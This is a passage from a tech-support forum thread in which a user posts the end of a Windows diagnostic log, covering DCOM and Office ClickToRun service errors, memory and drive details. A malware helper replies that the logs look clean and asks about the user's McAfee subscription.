Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (07/06/2016 12:17:45 PM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {00020827-0000-0000-C000-000000000046}

Error: (07/06/2016 12:14:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 3 time(s).

Error: (07/06/2016 12:05:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

Error: (07/06/2016 12:05:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

Error: (07/06/2016 08:47:45 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/06/2016 08:47:15 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/06/2016 08:17:45 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}

Error: (07/06/2016 08:17:15 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}

==================== Memory info ===========================

Processor: Intel® Core™ i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 44%
Total physical RAM: 4000.18 MB
Available physical RAM: 2227.86 MB
Total Virtual: 4832.18 MB
Available Virtual: 2833.51 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:922.04 GB) (Free:878.86 GB) NTFS
Drive e: (ESP) (Fixed) (Total:0.48 GB) (Free:0.41 GB) FAT32 ==>[system with boot components (obtained from drive)]
Drive w: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.4 GB) NTFS
Drive x: (PBR Image) (Fixed) (Total:8.09 GB) (Free:0.67 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E2DE1C3A)

Partition: GPT.

==================== End of Addition.txt ============================


  • 0

#6
RKinner

RKinner

    Malware Expert

  • Expert
  • 20,001 posts
  • MVP

Logs look good now.  Any problems?

 

How attached are you to McAfee?  Are you paying for it or do you get it for free?


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP